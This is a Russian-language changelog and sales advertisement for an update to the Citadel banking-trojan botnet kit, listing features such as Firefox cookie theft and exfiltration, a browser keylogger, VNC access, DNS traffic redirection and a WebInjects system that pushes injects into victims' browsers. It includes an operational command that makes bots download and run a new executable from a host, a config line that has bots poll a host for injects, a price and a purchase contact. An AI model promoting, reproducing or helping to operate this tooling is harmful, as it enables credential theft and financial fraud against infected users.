Update to Citadel : 1.3.5.1 Rain Edition - Original Adv

1. Самые современные средства и инструменты для профессиональной работы собраны специально для вас в новой версии.
2. Решены проблемы с отстуком и живучестью, работа стала еще приятнее, учтены самые важные пожелания.
3. Взят во внимание весь опыт работы за последний сезон, новичкам будет гораздо проще работать с новой версией, чем с предыдущими.
4. Теперь открыта в свободном доступе новая технология WebInjects для всех желающих.
5.  
6. [+] Сделана быстрая проверка ботов на Online-статус, списком на главной странцие.
7. [+] Возможность добавить бота в "Избранное" без отчетов.
8. [+] Сделано детектирование привилегий в системе(admin/user), отображается в "Информация о боте: [Флаги]"
9. [+] Сортировка скриншотов по дате.
10. [+] Добавлена возможность подключения других БД Citadel (как удаленные БД, так и старые/отключенные админки) для поиска отчетов.
11. [+] Расширен поиск в БД: можно указывать стоп-слова, например twitter.com, которые будут отсутствовать при выдаче результатов, чтобы не засорять логи мусором. Также, можно указать поиск не по содержимому отчета, а по URL Mask, это увеличивает скорость поиска данных.
12. [+] Расширен Jabber уведомитель, добавлены следущие события:
13. - Маски BotID на событие "Бот вышел в Online"
14. - Уведомление при обнаружении конкретного ПО из "installed software"
15. - Маска на содержимое CMD отчета.
16. - Параллельная удобная запись в log-файл всех событий, помимо Jabber-уведомлений.
17. [+] Добавлен бесплатный модуль граббинга кукисов в Firefox, экспортирует все cookies из браузера и отсылает вам.
18. [+] Исправлена ошибка удаления отчетов.
19. [+] Авто-обновление статистики главной страницы.
20. [+] Кнопка [Decode] на отчетах, которая позволяет декодировать urlencode(%0D) последовательности в удобный вид.
21. [+] Добавлена возможность определения online/offline статуса у бота в API.
22. [+] Полностью переделан алгоритм проверки в модуле WebSocks.
23. [+] Отображение скриптов(команд) постранично.
24. [+] Добавлена возможность отсылки сообщений на jabber через api.php (использует ваши персональные настройки в админке)
25. [+] Теперь при каждом HTTP/HTTPS отчете, добавляются cookies(Firefox/IE), а также заголовки:
26. [+] Полностью переделан внутренний алгоритм шифрования, отстук во много раз выше, живучесть дольше. Для переноса ботов на новую версию, выполняем команду user_execute http://www.host.com/1351.exe. RC4 ключ должен совпадать.
27. [+] Корректировка Browser Keylogger'a. Автоматически добавляются пробел, если с момента последнего нажатия клавиши прошло 5 секунд, необходимо для визуального разделения input-полей.
28. [+] Исправлен недочет с 302 редиректом, когда не срабатывал инжект, если осуществлялся переход по ссылке через javascript.
29. [+] Plaintext логи открываются в новой вкладке.
30. [+] Исправлена ошибка пропадания ботов из онлайна при включенном GeoIP.
31. [+] Отображение комментария к боту в VNC-модуле при наведении мышки, а также отсылка комментария в jabber вместе с информацией о коннекте.
32. [+] Возможность указать в DnsFilters(перенаправление траффика) маски со звездочками (*), можно сделать маску более гибкой.
33. [+] WebInjects. Модуль разработан для быстрого взаимодействия с холдером через технологию инжектов в браузеры. Модуль позволяет прогрузить любые инжекты конкретному BotID, стране или ботнету всего лишь за несколько минут, без редактирования конфига. Модуль работает через админку.
34. Краткий ликбез:
35. В конфиге бота, секция DynamicConfig, вписывается параметр url_webinjects "http://www.host.com/file.php" (путь до file.php). Бот дергает этот файл раз в 2 минуты, забирая оттуда пачку инжектов, которую выдает распределения система выдачи инжектов.
36. В разделе ВебИнжекты существуют 2 секции: "Группа вебинжектов" и "Паки", первая имеет структуру "Группа - Инжекты - Пользователи(допущенные к группе)" и отвечает за управление всеми инжектами. Вторая секция отвечает за настройку распространения инжектов(каким ботам доставляем инжекты и в каком количестве).
37. В главном меню, вразделе "Пользователи", при создании нового пользователя, есть права "r_botnet_webinjects_coder" это пользователь, который может управлять группой, привилегии которого назначит администратор. Иначе говоря, если вы допустите разработчика инжектов в админку и создадите ему аккаунт, то у него будут права создавать свои инжекты и редактировать их, чужие инжекты он не видит, отображается только своя группа списка инжектов. Т.е вы можете создать 5 групп и создать 5 инжект-кодеров, таким образом каждый человек отвечает за свою группу(набор инжектов). Вы смотрите в статистике что происходит в общей системе и можете объеденять все группы инжектов в один "пак", который будет прогружен всем без исключения ботам, либо отдельно взятой категории ботов по классу: страна или ботнет.
38. В админке создан специальный удобный визуальный редактор инжектов с подсветкой синтаксиса. Формат полностью совместим с зевсоформатом.
39. Сушествует несколько режимов для паков.
40. Dual - когда работает файл с инжектами из основного конфига + вебинжекты.
41. Single - когда работают только вебинжекты, а локальный файл с инжектами отключается.
42. Disabled - когда вебинжекты отключены, а локальный файл с инжектами работает.
43. Если случайно была допущена ошибка где-то в инжекте, то вебинжекты не соберутся и вам придет DEBUG-отчет с информацией, какой пак(bundle) не был собран.
44. В информации по боту, можно посмотреть историю прогрузки веб-инжектов, также, можно поискать DEBUG-отчеты по боту и посмотреть историю компиляций и ошибок вебинжектов.
45. Если бот получает сразу несколько паков(бандлов) где разные режимы работы: dual, single, disabled то из всех бандлов выбирается автоматически самый "узкий режим" работы, например single.
46. Бот постоянно сверяет наличие обновления любого из вебинжектов, и если таковое имеется, то он его обновляет у себя.
47. [+] Опция в конфиге disable_httpgrabber расширена и позволяет полностью избавиться от HTTP-отчетов, отправляя на сервер только HTTPS-отчеты со всех браузеров, если установлено значение "1". Избавьтесь от лишней нагрузки на сервер.
48. [+] Добавлена секция "HttpVipUrls" в WebFilters, которая позволяет добавлять ссылки-исключения(http://) при отсутствии HTTP-граббинга (disable_httpgrabber 1).
49. [+] Полностью перереботан мануал, теперь удобная навигация + раскрыты некоторые тонкости работы, а также добавлены ответы на популярные вопросы, с примерами. Изменено лицензионное соглашение, которое содержится в мануале.
50.  
51. Для получения новой версии, размещаем заявку в Jabber'e в таком формате: "<login в CRM> размещаю заявку на получение новой версии". Оплата поддержки должна быть своевременной, те, у кого задолжность более 3 месяцев - новую версию не получают. Срок выдачи от 3 до 72 часов. Если у вас имеется лицензированный партнер или саппорт, сразу пишите об этом в заявке до выдачи, а не после.
52.  
53. Для старых клиентов, обновление включено в абонентскую плату, для новых, цена базовой комплектации составляет теперь $3931.00
54.  
55. Jabber для покупки и обновлений: aquabox@lugmen.org.ar
56. Саппорт в праве отказать в продаже лицензии без объяснения причины. Поддержка клиентов на уровне сложных технических вопросов отменена из-за большого количества, обменивайтесь опытом с коллегами через CRM либо форумы.